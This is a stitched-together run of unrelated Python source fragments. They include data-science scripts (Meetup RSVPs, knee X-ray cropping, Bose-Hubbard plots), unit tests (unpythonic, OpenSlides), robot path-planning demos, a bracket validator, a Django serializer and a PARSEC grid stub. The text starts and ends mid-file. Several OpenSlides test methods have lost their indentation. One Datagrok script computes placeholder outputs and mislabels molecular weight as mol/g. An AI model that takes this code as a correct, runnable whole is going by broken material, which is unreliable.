    rsvp_df = pd.DataFrame(member_list, columns=['group_urlname', 'event_id', 'member_id'])
    return rsvp_df
def get_all_event_rsvps(urlname, list_of_event_ids, api_key):
    '''Accepts a group urlname and list of event ids, and returns a DataFrame of RSVPs. '''
    frames = [get_event_rsvps(urlname, eid, api_key) for eid in list_of_event_ids]
    if not frames:
        # no events: keep the documented column layout
        return pd.DataFrame(columns=['group_urlname', 'event_id', 'member_id'])
    # one concat at the end replaces the removed DataFrame.append
    return pd.concat(frames, ignore_index=True)
def setup_graph_plot(**kwargs):
    '''Creates an empty figure with one axis and requested input arguments. Removes the axis frame and sets X-Y aspect ratios to be equal. Returns a Matplotlib Figure and Axis object. '''
    fig, ax = plt.subplots(1, 1, **kwargs)
    # strip the frame, ticks and labels, and force a square aspect ratio so
    # network/graph layouts are not distorted
    ax.set_frame_on(False)
    ax.set_aspect(1)
    ax.tick_params(left=False, bottom=False, labelleft=False, labelbottom=False)
    return fig, ax
#name: Fab Arm Exchange
#language: python
#tags: model, simulation
#meta.modality: Antibody
#meta.domain: Manufacturing
#input: double meaConcentration = 60 {category:FAE Reaction Parameters; units:mM; caption:2-MEA Concentration} [2-MEA Concentration]
#input: double phOfFaeReaction = 7.5 {category:FAE Reaction Parameters; caption:pH of FAE Reaction} [pH of FAE Reaction]
#input: double faeReactionTime = 3 {category:FAE Reaction Parameters; units:hr; caption:FAE Reaction Time} [FAE Reaction Time]
#input: double ionicStrenght = 100 {category:FAE Reaction Parameters; units:mM} [Ionic Strength]
#input: double targetIgGConc = 10.5 {category:FAE Reaction Parameters; units:mg/ml; caption:Target IgG Conc} [Target IgG Conc]
#input: double massOverload = 1.05 {category:FAE Reaction Parameters; caption:Mass Overload (mAb1/mAb2)} [Mass Overload (mAb1/mAb2)]
#input: double P1MW = 148882 {category:FAE Reaction Parameters; units:mol/g; caption:Parental 1 MW} [Parental 1 MW]
#input: double reactionVolume = 0.5 {category:FAE Reaction Parameters; units:L} [Reaction Volume]
#input: double partialPressureOfOxygen = 0.21 {category:FAE Reaction Parameters; caption:Partial Pressure of Oxygen} [Partial Pressure of Oxygen]
#input: double doInitial = 0.9 {category:FAE Reaction Parameters; caption:DO (Initial)} [DO (Initial)]
#input: double doBuffer = 0.9 {category:FAE Reaction Parameters; caption:DO (Buffer)} [DO (Buffer)]
#input: double oxygenTransferRate = 0.443 {category:FAE Reaction Parameters; units:1/hr; caption:Oxygen Transfer rate} [Oxygen Transfer rate]
#input: double pressure = 1 {category:FAE Reaction Parameters; units:Bar} [Pressure]
#input: double temperature = 25 {category:FAE Reaction Parameters; units:C} [Temperature]
#input: bool Lid = False {category:FAE Reaction Parameters; caption:Lid (False=Closed, True=Opened)} [Lid (False=Closed, True=Opened)]
#input: double headSpace = 0.5 {category:FAE Reaction Parameters; units:L} [Head Space]
#input: double dfVolume = 12 {category:DF 1 Parameters; units:DV; caption:DF Volume} [DF Volume]
#input: double filterateRateDF = 10 {category:DF 1 Parameters; units:ml/min; caption:Filterate Rate (DF)} [Filterate Rate (DF)]
#input: double phOfUfdfBuffer = 7.5 {category:DF 1 Parameters; caption:pH of UFDF Buffer} [pH of UFDF Buffer]
#input: double phOfSecondUfdfBuffer = 7.5 {category:DF 2 Parameters (if any); caption:pH of 2nd UFDF Buffer} [pH of 2nd UFDF Buffer]
#input: double secondDfVolume = 0 {category:DF 2 Parameters (if any); units:DV; caption:2nd DF Volume} [2nd DF Volume]
#input: double dfConcentration = 30 {category: UF Parameters; caption:DF Concentration} [DF Concentration]
#input: double filterateRateUf = 10 {category: UF Parameters; units:ml/min; caption:Filterate Rate (UF)} [Filterate Rate (UF)]
#input: double holdTime = 0 {category:Hold Times Parameters (if any); units:hr} [Hold Time]
#input: double phDuringHoldTime = 7.5 {category:Hold Times Parameters (if any); caption:pH During Hold Time} [pH During Hold Time]
#input: double holdTime2 = 0 {category:Hold Times Parameters (if any); units:hr; caption:2nd Hold Time} [2nd Hold Time]
#input: double phDuringSecondHoldTime = 7.5 {category:Hold Times Parameters (if any); caption:pH During 2nd Hold Time} [pH During 2nd Hold Time]
#output: double c { category: Group A }
#output: double d { category: Group B }
# Placeholder model outputs: simple arithmetic combinations of the declared
# Datagrok inputs (bound by name from the #input annotations above).
c = holdTime + phOfSecondUfdfBuffer * massOverload
d = dfConcentration * phOfFaeReaction - meaConcentration
from .tictactoe.tictactoe import env, raw_env
|
import glob
import os
import pandas as pd
from tensorflow.keras.models import load_model
from configs import config_roi
from utils.util import *
# Load model
model = load_model(config_roi.ROI_MODEL_PATH, compile=False)
# Load CSV with image files list
data = pd.read_csv(config_roi.IMAGES_CSV_PATH)
images_list = list(data['image_name'])
# Run the ROI segmentation model on every listed PNG and crop square
# knee regions out of the full-resolution image.
for img_path in glob.glob(os.path.join(config_roi.IMAGES_TO_EXTRACT_ROI_PATH, '*.png')):
    file_name = os.path.basename(img_path)
    if file_name in images_list:
        # Load and process image
        print(file_name)
        img_name, img_extension = os.path.splitext(file_name)
        img = read_image(img_path, aspect_ratio='square') # (h,w,3)
        img_processed = preprocess_image(img, resize=True, size=224, equalize=True) # (h,w,3)
        img_original = preprocess_image(img, resize=False, equalize=True)
        # Predict ROI (batch of one; drop batch and channel dims)
        pred = model.predict(np.expand_dims(img_processed, 0))
        pred = pred.squeeze(0)
        pred = pred.squeeze(-1)
        # NOTE(review): cv2.resize expects dsize as (width, height) but
        # shape[:2] is (height, width); safe only because the image was read
        # with aspect_ratio='square' -- confirm.
        pred = cv2.resize(pred, (img_original.shape[:2]))
        # Obtain contours of ROI
        ret, thresh = cv2.threshold(pred, 0.5, 1, 0)
        thresh = 255 * thresh # scale by 255
        thresh = thresh.astype(np.uint8)
        contours, hierarchy = cv2.findContours(thresh, mode=cv2.cv2.RETR_TREE, method=cv2.CHAIN_APPROX_SIMPLE)
        # Find the largest contour by area
        areas = [cv2.contourArea(c) for c in contours]
        contours_sorted = [x for _, x in sorted(zip(areas, contours), reverse=True)]
        contours_max = contours_sorted[:1]
        # Make image uint8
        pred *= 255
        pred = pred.astype(np.uint8)
        # Obtain center and size of square bounding box that contains ROI
        # (the two largest contours -- at most one knee per image side)
        for cnt in contours_sorted[:2]:
            x, y, w, h = cv2.boundingRect(cnt)
            # get the center and the radius
            cx = x + w // 2
            cy = y + h // 2
            cr = max(w, h) // 2
            roi = []
            roi = img_original[cy - cr:cy + cr, cx - cr:cx + cr]
            ###########
            if roi.size == 0:
                print(f'{img_name} is empty')
                break
            # Crop ROI from original resolution, resize to 512x512 and save
            # Left knee (located on the right hand side of the image) is flipped
            # vertically to match Right knee orientation
            # i.e. knee medial side is located on the left, lateral side on the right
            # NOTE(review): the comment above says the *left* knee is flipped,
            # but cv2.flip is applied in the right-knee branch -- verify the
            # intended orientation.
            if cx >= img_original.shape[1] // 2: # left knee
                cv2.imwrite(f'{config_roi.ROI_SAVE_PATH}/{img_name}_L{img_extension}', cv2.resize(roi, (512, 512)))
            else: # right knee
                cv2.imwrite(f'{config_roi.ROI_SAVE_PATH}/{img_name}_R{img_extension}', cv2.flip(cv2.resize(roi, (512, 512)), 1))
            # Add bounding box to image
            cv2.rectangle(img_original, (cx - cr, cy - cr), (cx + cr, cy + cr), (0, 255, 0), 10)
        # save original image resized to 512x512 with ROI bounding boxes
        cv2.imwrite(f'{config_roi.ROI_VIZ_SAVE_PATH}/{img_name}_bbox{img_extension}', cv2.resize(img_original, (512, 512)))
|
# -*- coding: utf-8 -*-
from operator import add
from functools import partial
from collections import deque
from sys import float_info
from ..misc import call, callwith, raisef, pack, namelambda, timer, getattrrec, setattrrec, Popper, ulp
from ..fun import withself
def test():
    """Smoke tests for unpythonic.misc utilities.

    Exercises call/callwith, raisef, pack, namelambda, timer,
    getattrrec/setattrrec, Popper, and ulp with asserting examples.
    """
    # def as a code block (function overwritten by return value)
    #
    @call
    def result():
        return "hello"
    assert result == "hello"
    # use case 1: make temporaries fall out of scope
    @call
    def x():
        a = 2 # many temporaries that help readability...
        b = 3 # ...of this calculation, but would just pollute locals...
        c = 5 # ...after the block exits
        return a * b * c
    assert x == 30
    # use case 2: multi-break out of nested loops
    @call
    def result():
        for x in range(10):
            for y in range(10):
                if x * y == 42:
                    return (x, y)
        ... # more code here
    assert result == (6, 7)
    # can also be used normally
    assert call(add, 2, 3) == add(2, 3)
    # to pass arguments when used as decorator, use @callwith instead
    @callwith(3)
    def result(x):
        return x**2
    assert result == 9
    # specialize for given arguments, choose function later
    apply23 = callwith(2, 3)
    def myadd(a, b):
        return a + b
    def mymul(a, b):
        return a * b
    assert apply23(myadd) == 5
    assert apply23(mymul) == 6
    # callwith is not essential; we can do the same pythonically like this:
    a = [2, 3]
    assert myadd(*a) == 5
    assert mymul(*a) == 6
    # build up the argument list as we go
    # - note curry does not help, must use partial; this is because curry
    #   will happily call "callwith" (and thus terminate the gathering step)
    #   as soon as it gets at least one argument.
    p1 = partial(callwith, 2)
    p2 = partial(p1, 3)
    p3 = partial(p2, 4)
    apply234 = p3() # terminate gathering step by actually calling callwith
    def add3(a, b, c):
        return a + b + c
    def mul3(a, b, c):
        return a * b * c
    assert apply234(add3) == 9
    assert apply234(mul3) == 24
    # pythonic solution:
    a = [2]
    a += [3]
    a += [4]
    assert add3(*a) == 9
    assert mul3(*a) == 24
    # callwith in map, if we want to vary the function instead of the data
    m = map(callwith(3), [lambda x: 2*x, lambda x: x**2, lambda x: x**(1/2)])
    assert tuple(m) == (6, 9, 3**(1/2))
    # pythonic solution - use comprehension notation:
    m = (f(3) for f in [lambda x: 2*x, lambda x: x**2, lambda x: x**(1/2)])
    assert tuple(m) == (6, 9, 3**(1/2))
    # raisef: raise an exception from inside an expression (e.g. a lambda)
    l = lambda: raisef(ValueError, "all ok")
    try:
        l()
    except ValueError:
        pass
    else:
        assert False
    # pack: gather positional args into a tuple
    myzip = lambda lol: map(pack, *lol)
    lol = ((1, 2), (3, 4), (5, 6))
    assert tuple(myzip(lol)) == ((1, 3, 5), (2, 4, 6))
    # namelambda: rename a lambda (code object, __name__ and __qualname__)
    square = lambda x: x**2
    assert square.__code__.co_name == "<lambda>"
    assert square.__name__ == "<lambda>"
    assert square.__qualname__ == "test.<locals>.<lambda>"
    square = namelambda("square")(square)
    assert square.__code__.co_name == "square"
    assert square.__name__ == "square"
    assert square.__qualname__ == "test.<locals>.square"
    # CAUTION: in case of nested lambdas, the inner doesn't see the outer's new name:
    nested = namelambda("outer")(lambda: namelambda("inner")(withself(lambda self: self)))
    assert nested.__qualname__ == "test.<locals>.outer"
    assert nested().__qualname__ == "test.<locals>.<lambda>.<locals>.inner"
    # simple performance timer as a context manager
    with timer() as tictoc:
        for _ in range(int(1e6)):
            pass
    assert tictoc.dt > 0 # elapsed time in seconds (float)
    with timer(p=True): # auto-print mode for convenience
        for _ in range(int(1e6)):
            pass
    # access underlying data in an onion of wrappers
    class Wrapper:
        def __init__(self, x):
            self.x = x
    w = Wrapper(Wrapper(42))
    assert type(getattr(w, "x")) == Wrapper
    assert type(getattrrec(w, "x")) == int
    assert getattrrec(w, "x") == 42
    setattrrec(w, "x", 23)
    assert type(getattr(w, "x")) == Wrapper
    assert type(getattrrec(w, "x")) == int
    assert getattrrec(w, "x") == 23
    # pop-while iterator
    inp = deque(range(5)) # efficiency: deque can popleft() in O(1) time
    out = []
    for x in Popper(inp):
        out.append(x)
    assert inp == deque([])
    assert out == list(range(5))
    # items appended during iteration are also popped
    inp = deque(range(3))
    out = []
    for x in Popper(inp):
        out.append(x)
        if x < 10:
            inp.appendleft(x + 10)
    assert inp == deque([])
    assert out == [0, 10, 1, 11, 2, 12]
    # works for a list, too, although not efficient (pop(0) takes O(n) time)
    inp = list(range(5))
    out = []
    for x in Popper(inp):
        out.append(x)
    assert inp == []
    assert out == list(range(5))
    # Unit in the Last Place, float utility
    # https://en.wikipedia.org/wiki/Unit_in_the_last_place
    eps = float_info.epsilon
    assert ulp(1.0) == eps
    # test also at some base-2 exponent switch points
    assert ulp(2.0) == 2 * eps
    assert ulp(0.5) == 0.5 * eps
    print("All tests PASSED")

if __name__ == '__main__':
    test()
|
import context; context.set_context()
import os
import sys
import logging
import util
import gphoto
from gphoto.google_library import GoogleLibrary
from gphoto.imageutils import ImageUtils
# -----------------------------------------------------
# Main
# -----------------------------------------------------
def main():
    """
    Specify the year in which to narrow the search of images belonging to an album

    Usage: <script> <year>. Walks the locally cached Google Photos library,
    collects images shot in the given year, and writes a JSON report grouping
    them by album (plus a list of images that have no shot date).
    """
    if len(sys.argv) < 2:
        logging.error("Too few arguments. See help")
        return

    # Get arguments
    arg_year = sys.argv[1]

    # load the locally cached library metadata
    GoogleLibrary.load_library()
    google_cache = GoogleLibrary.cache()
    google_album_ids = google_cache['album_ids']
    google_album_titles = google_cache['album_titles']
    google_image_ids = google_cache['image_ids']
    google_image_filenames = google_cache['image_filenames']
    google_album_images = google_cache['album_images']
    google_image_albums = google_cache['image_albums']

    result_no_dateshot = []
    result_albums = {}
    result = {
        'no-dateshot': result_no_dateshot,
        'albums': result_albums
    }

    # Get dateshot. If not there then report it
    for google_image_id, google_image in google_image_ids.items():
        dateShot = None
        image_metadata = google_image.get('mediaMetadata')
        if image_metadata:
            dateShot = image_metadata.get('creationTime')
        if dateShot is None:
            result_no_dateshot.append({
                'id': google_image_id,
                'productUrl': google_image.get('productUrl')
            })
            continue

        # We have a dateshot. parse it and get the year
        # If year does not match then ignore the image
        image_year = dateShot.split('-')[0]
        if arg_year != image_year:
            continue

        # Get its google album and add it to the result
        google_image_album_object = google_image_albums.get(google_image_id)
        if google_image_album_object is None or len(google_image_album_object) <= 0:
            continue

        # This image has albums. Add the albums to the results
        # and add the image to the albums
        for google_album_id in google_image_album_object:
            result_album = result_albums.get(google_album_id)
            result_album_images = None
            if result_album is None:
                # first time we see this album: build its result entry
                google_album = google_album_ids.get(google_album_id)
                result_album_images = []
                result_album = {
                    'id': google_album_id,
                    'title': google_album.get('title'),
                    'productUrl': google_album.get('productUrl'),
                    'shared': google_album.get('shared'),
                    'images': result_album_images
                }
                result_albums[google_album_id] = result_album
            else:
                result_album_images = result_album.get('images')

            result_album_images.append((google_image_id, google_image.get('productUrl')))
            # result_album_images.append({
            #     'id': google_image_id,
            #     'productUrl': google_image.get('productUrl')
            # })

    gphoto.save_to_file(result, f"google_images_belonging_to_album_in_year_{arg_year}.json")

if __name__ == '__main__':
    main()
from openslides_backend.permissions.permissions import Permissions
from tests.system.action.base import BaseActionTestCase
class ProjectorAddToPreview(BaseActionTestCase):
    def setUp(self) -> None:
        # Two meetings: meeting 1 has projectors 1-3 (projectors 1 and 2
        # already hold preview projections of assignment/1 with weights
        # 10 and 20/30), meeting 2 has projector 4.
        super().setUp()
        self.set_models(
            {
                "meeting/1": {"is_active_in_organization_id": 1},
                "meeting/2": {"is_active_in_organization_id": 1},
                "assignment/1": {"meeting_id": 1},
                "projector/1": {"meeting_id": 1, "preview_projection_ids": [10]},
                "projector/2": {"meeting_id": 1, "preview_projection_ids": [11, 12]},
                "projector/3": {"meeting_id": 1},
                "projector/4": {"meeting_id": 2},
                "projection/10": {
                    "meeting_id": 1,
                    "content_object_id": "assignment/1",
                    "preview_projector_id": 1,
                    "weight": 10,
                },
                "projection/11": {
                    "meeting_id": 1,
                    "content_object_id": "assignment/1",
                    "preview_projector_id": 2,
                    "weight": 20,
                },
                "projection/12": {
                    "meeting_id": 1,
                    "content_object_id": "assignment/1",
                    "preview_projector_id": 2,
                    "weight": 30,
                },
            }
        )
def test_add_to_preview(self) -> None:
response = self.request(
"projector.add_to_preview",
{"ids": [1, 2], "content_object_id": "assignment/1", "stable": False},
)
self.assert_status_code(response, 200)
projector_1 = self.get_model("projector/1")
assert projector_1.get("preview_projection_ids") == [10, 13]
projector_2 = self.get_model("projector/2")
assert projector_2.get("preview_projection_ids") == [11, 12, 14]
projection_13 = self.get_model("projection/13")
assert projection_13.get("preview_projector_id") == 1
assert projection_13.get("content_object_id") == "assignment/1"
assert projection_13.get("weight") == 11
projection_14 = self.get_model("projection/14")
assert projection_14.get("preview_projector_id") == 2
assert projection_14.get("content_object_id") == "assignment/1"
assert projection_14.get("weight") == 31
def test_add_to_preview_empty_projector(self) -> None:
response = self.request(
"projector.add_to_preview",
{"ids": [3], "content_object_id": "assignment/1", "stable": False},
)
self.assert_status_code(response, 200)
projector_1 = self.get_model("projector/3")
assert projector_1.get("preview_projection_ids") == [13]
projection_13 = self.get_model("projection/13")
assert projection_13.get("preview_projector_id") == 3
assert projection_13.get("content_object_id") == "assignment/1"
assert projection_13.get("weight") == 2
def test_add_to_preview_non_unique_ids(self) -> None:
response = self.request(
"projector.add_to_preview",
{"ids": [1, 1], "content_object_id": "assignment/1", "stable": False},
)
self.assert_status_code(response, 400)
assert "data.ids must contain unique items" in response.json["message"]
def test_add_to_preview_check_meeting_id(self) -> None:
response = self.request(
"projector.add_to_preview",
{"ids": [4], "content_object_id": "assignment/1", "stable": False},
)
self.assert_status_code(response, 400)
self.assertIn(
"The following models do not belong to meeting 1: ['projector/4']",
response.json["message"],
)
def test_add_to_preview_no_permission(self) -> None:
self.base_permission_test(
{},
"projector.add_to_preview",
{"ids": [1, 2], "content_object_id": "assignment/1", "stable": False},
)
def test_add_to_preview_permission(self) -> None:
self.base_permission_test(
{},
"projector.add_to_preview",
{"ids": [1, 2], "content_object_id": "assignment/1", "stable": False},
Permissions.Projector.CAN_MANAGE,
)
|
import sys
import numpy as np
import matplotlib.pyplot as plt
import sys
import os
import time
import argparse
from visual_utils import generate_listcol, generate_cmap
if __name__ == '__main__':
    # --- Command-line arguments ---
    parser = argparse.ArgumentParser()
    parser.add_argument('--basename', type=str, default='exp_20200220_bosehubbard')
    parser.add_argument('--res', type=str, default='results')
    parser.add_argument('--dim', type=int, default=0)
    parser.add_argument('--stats', type=int, default=1)  # 0=Pentropy, 1=Pnorm, 2=|difference|
    args = parser.parse_args()
    print(args)
    resname, basename, d = args.res, args.basename, args.dim
    typestats = args.stats
    labels = ['Pentropy', 'Pnorm', 'Diff']

    # --- Plot style ---
    plt.rc('font', family='serif')
    plt.rc('mathtext', fontset='cm')
    plt.rcParams['font.size'] = 20
    cols = generate_listcol(option=1)

    def minmax_norm(a):
        """Rescale *a* linearly onto [0, 1]; a constant array maps to zeros.

        The original divided by (max - min) unconditionally and returned an
        all-NaN array for constant input.
        """
        lo, hi = np.min(a), np.max(a)
        if hi == lo:
            return np.zeros_like(a, dtype=float)
        return (a - lo) / (hi - lo)

    lstyle = 'dashed'
    alpha = 0.7

    # System sizes to aggregate, keyed by plot label.
    Ls = dict()
    Ls['high'] = [300, 400, 500, 600, 700]
    Ls['mid'] = [30, 40, 50, 60, 70]
    Ls['low'] = [12, 14, 16, 18, 20]
    Ls['all'] = [30, 40, 50, 60, 70, 80, 200, 300, 400, 500, 600, 700]
    Ls['all2'] = [12, 14, 16, 18, 20, 40, 50, 60, 70, 80, 300, 400, 500, 600, 700]

    for lb in ['all', 'all2']:
        fig, ax = plt.subplots()
        ax.set_xlabel(r"Tunneling " r"$J/U$", fontsize=28)
        ax.set_ylabel(labels[typestats], fontsize=28)
        for i in range(len(Ls[lb])):
            L = Ls[lb][i]
            # Colour scheme: 'all' splits small/large L; 'all2' colours per block of 5.
            if lb == 'all':
                c = cols[0] if L < 100 else cols[1]
            else:
                c = cols[int(i / 5)]
            statsfile = '{}_L_{}_stats_dim_{}.txt'.format(basename, L, d)
            statsfile = os.path.join(resname, statsfile)
            print(statsfile)
            if not os.path.isfile(statsfile):
                continue  # silently skip missing runs, as before
            arr = np.loadtxt(statsfile)
            print(arr.shape)
            glist, npent_list, pnorm_list = arr[:, 0], arr[:, 1], arr[:, 3]
            # Normalize each statistic onto [0, 1] before plotting.
            npent_list = minmax_norm(npent_list)
            pnorm_list = minmax_norm(pnorm_list)
            if typestats == 0:
                vals_list = npent_list
            elif typestats == 1:
                vals_list = pnorm_list
            else:
                vals_list = abs(npent_list - pnorm_list)
            ax.plot(glist, vals_list, linestyle=lstyle, markersize=8, color=c, alpha=alpha,
                    linewidth=4.0, label='L-{}'.format(L))
        ax.tick_params(direction='in', length=8)
        for figtype in ['png', 'pdf', 'svg']:
            fig_ofile = os.path.join(resname, '{}_{}_agg_{}_fig_dim_{}.{}'.format(basename, lb, typestats, d, figtype))
            plt.savefig(fig_ofile, bbox_inches='tight', format=figtype)
        # Release the figure so repeated groups do not accumulate in memory.
        plt.close(fig)
|
import numpy as np
import matplotlib.pyplot as plt
from time import sleep
from grid_map import StochOccupancyGrid2DLazy
from global_planners import AstarPlanner, NavFuncitonPlanner
from local_planners import DynamicWindowPlanner
from source.actors.simulated_human import SimulatedPathFollowingHuman
from source.actors.simulated_robot import SimulatedDetRobot
from utils import SimpleObstacle
def test_global_planner():
    """Exercise the navigation-function global planner on a 10x10 toy map."""
    # Axis-aligned rectangular obstacles: ((xmin, ymin), (xmax, ymax)) each.
    obstacle_boxes = [((6, 6), (8, 7)), ((2, 1), (4, 2)), ((2, 4), (4, 6)), ((6, 2), (8, 4))]
    width, height = 10, 10
    map_resolution = 0.05
    plan_resolution = 0.25

    # Unknown occupancy everywhere to start (-1 per cell).
    cell_probs = -np.ones((int(width * height / map_resolution ** 2 + 0.5),))

    # Start and goal positions.
    start = (0, 0)
    goal = (8, 8)

    # Build the lazy stochastic occupancy grid and mark obstacle/free cells.
    grid = StochOccupancyGrid2DLazy(map_resolution, int(width / map_resolution), int(height / map_resolution),
                                    0, 0, int(plan_resolution / map_resolution) * 1, cell_probs)
    grid.from_obstacles(obstacle_boxes)
    grid.compute_free_states()

    # Navigation-function planner (an AstarPlanner would fit the same API).
    nav_planner = NavFuncitonPlanner((0, 0), (10, 10), start, goal, grid, plan_resolution)

    # Solve, reconstruct, and display the path.
    nav_planner.solve(verbose=True)
    nav_planner.reconstruct_path()
    nav_planner.visualize_path()

    # Reconstruct again from an intermediate point and display once more.
    nav_planner.reconstruct_path(np.array([7, 5]))
    nav_planner.visualize_path()
def test_dwa_planner():
    """Run the DWA local planner against a moving simulated human."""
    # Environment: two rectangular obstacles in a 5x5 workspace.
    obstacles = [((0.5, 1.5), (1.5, 3.5)), ((3.5, 1.5), (4.5, 3.5))]
    width = 5
    height = 5
    map_resolution = 0.05
    plan_resolution = 0.25

    # Unknown occupancy everywhere to start (-1 per cell).
    probs = -np.ones((int(width * height / map_resolution ** 2 + 0.5),))

    # Build the occupancy grid; free states computed with a 0.2 margin.
    occupancy = StochOccupancyGrid2DLazy(map_resolution, int(width / map_resolution), int(height / map_resolution),
                                         0, 0, int(plan_resolution / map_resolution) * 1, probs)
    occupancy.from_obstacles(obstacles)
    occupancy.compute_free_states(0.2)

    # Start and goal poses (x, y, theta).
    x_init = (0.75, 0.75, 0.0)
    x_goal = (4.25, 4.25, 0.0)

    # Global plan via the navigation-function planner.
    planner_nav = NavFuncitonPlanner((0, 0), (width, height), x_init[0:2],
                                     x_goal[0:2], occupancy, plan_resolution)
    planner_nav.solve(verbose=True)
    planner_nav.reconstruct_path()

    # Interactive plot axis for the simulation.
    fig, ax = plt.subplots()
    ax.set_aspect('equal')
    ax.set_xlim(0, width)
    ax.set_ylim(0, height)
    plt.ion()
    planner_nav.visualize_path(ax)
    plt.pause(1)

    # Create a robot and a path-following human crossing the corridor.
    default_robot_size = 0.2
    robot = SimulatedDetRobot(fp_radius=default_robot_size, pose_init=x_init)
    human0 = SimulatedPathFollowingHuman(fp_radius=0.2)
    traj = np.array([[0.0, 3.1, 1.5, np.pi / 2.0],
                     [20.0, 3.1, 3.5, np.pi / 2.0]])
    human0.load_trajectory(traj=traj)

    # Show the robot and human.
    robot.plot(ax)
    human0.plot(ax)
    plt.pause(0.1)

    # Local planner (DWA), re-planned at 10 Hz.
    dt_local_planner = 0.1
    planner_dwa = DynamicWindowPlanner(0.2, 5,
                                       global_planner=planner_nav,
                                       robot_radius=default_robot_size)

    # Simulation at 100 Hz; plotting at 20 Hz.
    t_curr = 0.0
    dt = 0.01
    dt_plot = 0.05
    r_local_planner = int(dt_local_planner / dt)
    r_plot = int(dt_plot / dt)
    for k in range(1500):
        # Update cmd_vel at the local-planner rate.
        if k % r_local_planner == 0:
            # Sense: treat the human as a single circular obstacle.
            obs_list = [SimpleObstacle(human0.get_pose(), (0.0, 0.0), 0.2)]
            planner_dwa.update_obstacles(obs_list)
            cmd_vel = planner_dwa.solve(robot.get_pose(), robot.get_velocity())
            if cmd_vel is None:
                # No feasible velocity found: stop in place.
                # (The original had a redundant if/else where both branches
                # called robot.set_velocity(cmd_vel).)
                cmd_vel = (0.0, 0.0)
            robot.set_velocity(cmd_vel)
        # Propagate the simulated actors.
        robot.update(dt)
        human0.update(dt)
        sleep(dt * 0.2)
        # Plot at the lower frequency.
        if k % r_plot == 0:
            robot.plot(ax)
            human0.plot(ax)
            plt.pause(0.001)
        # Advance simulation time.
        t_curr += dt
if __name__ == "__main__":
    # test_global_planner()  # alternative demo: global planner only
    test_dwa_planner()
|
class Solution:
    def isValid(self, s: str) -> bool:
        """Return True if every bracket in ``s`` is closed by the matching
        bracket in the correct order (LeetCode 20, "Valid Parentheses").

        Any character that is not one of ``()[]{}`` makes the string invalid,
        matching the original behavior. An empty string is valid.

        The original pre-checked bracket counts and used a no-op on mismatched
        closers; this single-pass stack version is equivalent and simpler.
        """
        pairs = {')': '(', ']': '[', '}': '{'}
        stack = []
        for ch in s:
            if ch in '([{':
                stack.append(ch)
            elif ch in pairs:
                # A closer must match the most recent unclosed opener.
                if not stack or stack.pop() != pairs[ch]:
                    return False
            else:
                # Non-bracket characters are rejected outright.
                return False
        # Valid only if every opener was closed.
        return not stack
|
from rest_framework import serializers
from django.http import Http404
from rest_framework import status
from rest_framework.response import Response
from ..projects import ProjectSerializer
from iaso.models import Project, FeatureFlag, Form
from hat.audit import models as audit_models
import logging
logger = logging.getLogger(__name__)
class AppSerializer(ProjectSerializer):
    """We override the project serializer to "switch" the id and app_id fields. It means that within the "apps" API,
    the app_id field from the Project model is used as the primary key."""

    class Meta(ProjectSerializer.Meta):
        model = Project
        fields = ["id", "name", "app_id", "forms", "feature_flags", "needs_authentication", "created_at", "updated_at"]
        read_only_fields = ["id", "created_at", "updated_at"]

    id = serializers.CharField(read_only=True, source="app_id")

    def validate_forms(self, data):
        """Accept only forms linked to the requesting user's account.

        Raises serializers.ValidationError as soon as a form from another
        account is found (same behavior as before).
        """
        validated_forms = []
        current_account_id = self.context["request"].user.iaso_profile.account.id
        for form in data:
            account_ids = Form.objects.filter(id=form.id).values_list("projects__account", flat=True).distinct()
            if current_account_id not in account_ids:
                raise serializers.ValidationError("Form not associated to any of the accounts")
            validated_forms.append(form)
        return validated_forms

    def create(self, validated_data):
        """Create a Project ("app") owned by the requester's account."""
        request = self.context["request"]
        app_id = validated_data.get("app_id", None)
        name = validated_data.get("name", None)
        forms = validated_data.get("forms", None)
        needs_auth = validated_data.get("needs_authentication", None)
        feature_flags = validated_data.get("feature_flags", None)

        new_app = Project()
        new_app.app_id = app_id
        new_app.name = name
        new_app.account = request.user.iaso_profile.account
        new_app.needs_authentication = False if needs_auth is None else needs_auth
        # Feature flags take precedence over the legacy needs_authentication
        # field. Guard against a missing feature_flags payload: the original
        # iterated it unconditionally and raised TypeError on None.
        if feature_flags is not None:
            new_app.needs_authentication = any(
                f_f["code"] == "REQUIRE_AUTHENTICATION" for f_f in feature_flags
            )
        new_app.save()

        if forms is not None:
            for form in forms:
                new_app.forms.add(form)
        if feature_flags is not None:
            for f_f in feature_flags:
                new_app.feature_flags.add(FeatureFlag.objects.get(code=f_f["code"]))
        # Legacy support; remove when the needs_authentication field is removed.
        if needs_auth:
            new_app.feature_flags.add(FeatureFlag.objects.get(code="REQUIRE_AUTHENTICATION"))
        return new_app

    def update(self, instance, validated_data):
        """Update an existing app; feature flags drive needs_authentication."""
        feature_flags = validated_data.pop("feature_flags", None)
        needs_authentication = validated_data.pop("needs_authentication", None)
        forms = validated_data.pop("forms", None)
        app_id = validated_data.pop("app_id", None)
        name = validated_data.pop("name", None)
        if app_id is not None:
            instance.app_id = app_id
        if name is not None:
            instance.name = name
        # Legacy field; remove this block when needs_authentication is removed.
        if needs_authentication is not None:
            instance.needs_authentication = needs_authentication
        # Guard against feature_flags being absent (original crashed on None).
        if feature_flags is not None:
            instance.needs_authentication = any(
                f_f["code"] == "REQUIRE_AUTHENTICATION" for f_f in feature_flags
            )
        instance.save()
        if forms is not None:
            instance.forms.clear()
            for form in forms:
                instance.forms.add(form)
        if feature_flags is not None:
            instance.feature_flags.clear()
            for f_f in feature_flags:
                instance.feature_flags.add(FeatureFlag.objects.get(code=f_f["code"]))
        # Legacy support; remove when the needs_authentication field is removed.
        if needs_authentication:
            instance.feature_flags.add(FeatureFlag.objects.get(code="REQUIRE_AUTHENTICATION"))
        return instance
|
"""
Let's start with the simplest problem that can exist in Python.
Todo: Given three integers, return the largest integer.
"""
# solution one
def greatest_1(a, b, c):
    """Return the largest of the three values using the built-in ``max``."""
    return max((a, b, c))
# solution two
def greatest_2(a, b, c):
    """Return the largest of three integers via explicit comparisons.

    Uses >= comparisons so ties are handled: the original used strict >
    everywhere and fell off the end (returning None) whenever the maximum
    was not unique, e.g. greatest_2(5, 5, 3).
    """
    if a >= b and a >= c:
        return a
    if b >= c:
        return b
    return c
# solution 3
def greatest_3(a, b, c):
    """Return the largest of three integers by sorting (implements the stub)."""
    return sorted((a, b, c))[-1]
|
import os,re, glob
import numpy as np
import pandas as pd
import logging
import tarfile
from distutils.version import StrictVersion
from ..config import ISOCHRONES
from ..grid import ModelGrid
class ParsecModelGrid(ModelGrid):
    """Model grid for PARSEC isochrones.

    Resolves shortcut band names to photometric systems, parses per-file
